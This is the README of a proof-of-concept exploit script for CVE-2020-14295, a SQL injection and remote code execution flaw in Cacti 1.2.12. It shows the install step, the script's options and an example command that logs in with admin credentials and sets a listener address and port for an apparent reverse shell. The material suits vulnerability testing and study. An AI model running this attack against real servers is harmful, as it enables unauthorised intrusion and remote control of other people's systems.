CVE-2020-14295 proof of concept. The original post can be found at Exploit-DB.

$ python3 -m pip install -r requirements.txt

$ python3 cacti_sqli_rce.py --help
usage: cacti_sqli_rce.py [-h] -t <target/host URL> -u <user> -p <password>
                         --lhost <lhost> --lport <lport>

[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution

optional arguments:
  -h, --help            show this help message and exit
  -t <target/host URL>  target/host URL, example: http://192.168.15.58
  -u <user>             user to log in
  -p <password>         user's password
  --lhost <lhost>       your IP address
  --lport <lport>       your listening port

$ python3 cacti_sqli_rce.py -t http://cacti-test.localdomain -u admin -p password --lhost 127.0.0.1 --lport 9001